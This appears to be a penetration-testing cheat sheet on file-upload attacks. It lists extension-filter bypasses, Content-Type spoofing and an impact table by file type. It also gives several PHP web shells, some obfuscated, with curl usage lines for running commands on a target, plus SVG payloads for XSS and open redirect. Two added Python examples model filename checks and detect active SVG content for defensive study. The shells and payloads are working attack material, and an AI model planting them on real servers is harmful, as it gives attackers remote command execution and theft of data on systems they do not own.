File-Upload
File extension
# extension blacklisted:
PHP: .phtm, .phtml, .phps, .pht, .php2, .php3, .php4, .php5, .shtml, .phar, .pgif, .inc
ASP: .asp, .aspx, .cer, .asa
Jsp: .jsp, .jspx, .jsw, .jsv, .jspf
Coldfusion: .cfm, .cfml, .cfc, .dbm
Using random capitalization: .pHp, .pHP5, .PhAr
pht,phpt,phtml,php3,php4,php5,php6,php7,phar,pgif,phtm,phps,shtml,inc
# extension whitelisted:
file.jpg.php
file.php.jpg
file.php.blah123jpg
file.php%00.jpg
file.php\x00.jpg
file.php%00
file.php%20
file.php%0d%0a.jpg
file.php.....
file.php/
file.php.\
file.
.html
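Which of the names above slip past which kind of check? The script below is an added example (not part of these notes): it models three server-side filename checks, a naive blacklist, a naive allowlist and a hardened handler, and feeds each one the bypass candidates from the lists above. It assumes the handler receives the name as sent in the multipart `filename=` field (URL-decoded before use) and that the file system truncates at the first NUL byte, the classic C-library behaviour that makes `file.php%00.jpg` work. The candidate list and the extension sets are constructed test data.

```python
"""Filename checks versus the bypass candidates above (added example)."""
import secrets
import urllib.parse

# Extensions the web server would hand to an interpreter (subset of the
# PHP/ASP/JSP list above, lowercase, no leading dot).
EXECUTABLE = {"php", "phtml", "phtm", "phps", "pht", "php3", "php4", "php5",
              "php7", "phar", "inc", "asp", "aspx", "jsp"}
# What a naive developer blocks: only the obvious three.
NAIVE_BLACKLIST = {"php", "asp", "jsp"}
# What the hardened handler allows.
ALLOWLIST = {"jpg", "jpeg", "png", "gif"}

# Bypass candidates from the notes above (constructed test input, exactly
# as they would appear in the filename= field of the multipart part).
CANDIDATES = [
    "file.pHp", "file.phtml", "file.php5", "file.PhAr",
    "file.jpg.php", "file.php.jpg", "file.php%00.jpg", "file.php%0d%0a.jpg",
    "file.php%20", "file.php.", "file.php/", "file.",
]


def last_ext(name: str) -> str:
    """Text after the last dot, or '' when there is no dot."""
    return name.rsplit(".", 1)[1] if "." in name else ""


def on_disk(raw: str) -> str:
    """Name the file system actually stores: URL-decoded, cut at the first NUL
    (assumed C-library truncation)."""
    return urllib.parse.unquote(raw).split("\x00", 1)[0]


def naive_blacklist(raw: str):
    """Case-sensitive compare of the raw last extension against a short list.
    Returns the stored name on acceptance, None on rejection."""
    return None if last_ext(raw) in NAIVE_BLACKLIST else on_disk(raw)


def naive_allowlist(raw: str):
    """Accepts when an allowed extension appears anywhere in the raw name
    (the strpos()/contains() bug): file.jpg.php and file.php%00.jpg pass."""
    ok = any("." + ext in raw.lower() for ext in ALLOWLIST)
    return on_disk(raw) if ok else None


def hardened(raw: str):
    """Decode, reject control characters and path separators, require the
    last extension to be on the allowlist, then discard the client name and
    store under a random one with exactly one dot. The rename is what defuses
    file.php.jpg on Apache setups that map every extension of a
    multi-extension name to a handler."""
    decoded = urllib.parse.unquote(raw)
    if any(ord(c) < 0x20 or c in "/\\" for c in decoded):
        return None
    ext = last_ext(decoded).lower()
    if ext not in ALLOWLIST:
        return None
    return f"{secrets.token_hex(16)}.{ext}"


def bypasses(check) -> list:
    """Candidates the check accepts that end up stored with an executable extension."""
    found = []
    for raw in CANDIDATES:
        stored = check(raw)
        if stored is not None and last_ext(stored).lower() in EXECUTABLE:
            found.append(raw)
    return found


if __name__ == "__main__":
    for check in (naive_blacklist, naive_allowlist, hardened):
        print(f"{check.__name__:16} {bypasses(check)}")
```

The naive blacklist falls to case tricks, alternate PHP extensions and the NUL byte; the naive allowlist falls to `file.jpg.php` and `file.php%00.jpg`; the hardened handler accepts `file.php.jpg` but stores it as `<random>.jpg`, which is the point of never reusing the client-supplied name.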
Payloads
<?php system($_GET["cmd"]);?> # ?cmd= (ex: ?cmd=ls -la)
<?=`$_GET[0]`?> # ?0=command
<?=`$_POST[0]`?>
# Usage : curl -X POST http://target.com/path/to/shell.php -d "0=command"
<?=`{$_REQUEST['_']}`?>
# Usage: http://target.com/path/to/shell.php?_=command OR curl -X POST http://target.com/path/to/shell.php -d "_=command"
<?=$_="";$_="'" ;$_=($_^chr(4*4*(5+5)-40)).($_^chr(47+ord(1==1))).($_^chr(ord('_')+3)).($_^chr(((10*10)+(5*3))));$_=${$_}['_'^'o'];echo`$_`?>
# Usage : http://target.com/path/to/shell.php?0=command
<?php $_="{"; $_=($_^"<").($_^">;").($_^"/"); ?><?=${'_'.$_}['_'](${'_'.$_}['__']);?>
# Usage : http://target.com/path/to/shell.php?_=function&__=argument (ex: http://target.com/path/to/shell.php?_=system&__=ls)
Content type
- Keep the filename (e.g. shell.php) but change the part's Content-Type header to an image type:
Content-Type: image/jpeg, image/gif, image/png
Content length
# Minimal payload when the upload size is limited (usage: ?x=command):
<?=`$_GET[x]`?>
Impact by extension
asp, aspx, php5, php, php3: --> webshell, rce
svg: --> stored xss, ssrf, xxe
gif: --> stored xss, ssrf
csv: --> csv injection
xml: --> xxe
avi: --> lfi, ssrf
html, js: --> html injection, xss, open redirect
png, jpeg: --> pixel flood attack dos
zip: --> rce via lfi, dos
pdf, pptx: --> ssrf, blind xxe
File name
Other Test Cases
File Upload Exploitation
SVG file To XSS
```xml
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
  <script type="text/javascript">
    alert("h0tak88r XSS");
  </script>
</svg>
```
Open Redirect when uploading svg files
```xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg onload="window.location='http://www.google.com'" xmlns="http://www.w3.org/2000/svg">
</svg>
```
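Both SVG payloads above work because the browser treats an SVG opened from the application's origin as a full document. The checker below is an added example (not part of these notes): it parses an uploaded SVG with the standard library and reports the constructs those two payloads rely on, a `<script>` element and an `on*` event handler, plus `javascript:` hrefs and `<foreignObject>`. The three SVG strings are constructed test input; the first two reproduce the payloads from this section.

```python
"""Finding active content in an uploaded SVG (added example)."""
import xml.etree.ElementTree as ET

XSS_SVG = """<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
  <script type="text/javascript">alert("h0tak88r XSS");</script>
</svg>"""

REDIRECT_SVG = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg onload="window.location='http://www.google.com'" xmlns="http://www.w3.org/2000/svg">
</svg>"""

# Constructed benign file: a plain shape and an ordinary https link.
CLEAN_SVG = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <rect width="10" height="10" fill="blue"/>
  <a xlink:href="https://example.org"><circle r="3"/></a>
</svg>"""


def local(name: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on tags and attributes."""
    return name.rsplit("}", 1)[-1]


def find_active_content(svg) -> list:
    """Return human-readable findings; an empty list means nothing suspicious.
    xml.etree does not fetch external entities, but for untrusted XML in
    production prefer defusedxml, which also limits entity expansion."""
    if isinstance(svg, str):
        svg = svg.encode("utf-8")
    root = ET.fromstring(svg)
    findings = []
    for el in root.iter():
        tag = local(el.tag).lower()
        if tag in ("script", "foreignobject"):
            findings.append(f"<{tag}> element")
        for attr, value in el.attrib.items():
            name = local(attr).lower()
            if name.startswith("on"):
                findings.append(f"{name} handler on <{tag}>")
            elif name == "href" and value.strip().lower().startswith("javascript:"):
                findings.append(f"javascript: href on <{tag}>")
    return findings


if __name__ == "__main__":
    for label, doc in (("xss", XSS_SVG), ("redirect", REDIRECT_SVG), ("clean", CLEAN_SVG)):
        print(f"{label:9}", find_active_content(doc) or "no active content")
```

Script inside an SVG does not run when the file is embedded through `<img>`; the exposure is the direct URL to the upload. Serving uploads with `Content-Disposition: attachment` or from a separate origin, or rasterising them, closes that path even when a checker like this one misses a construct.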
Top Upload reports from HackerOne: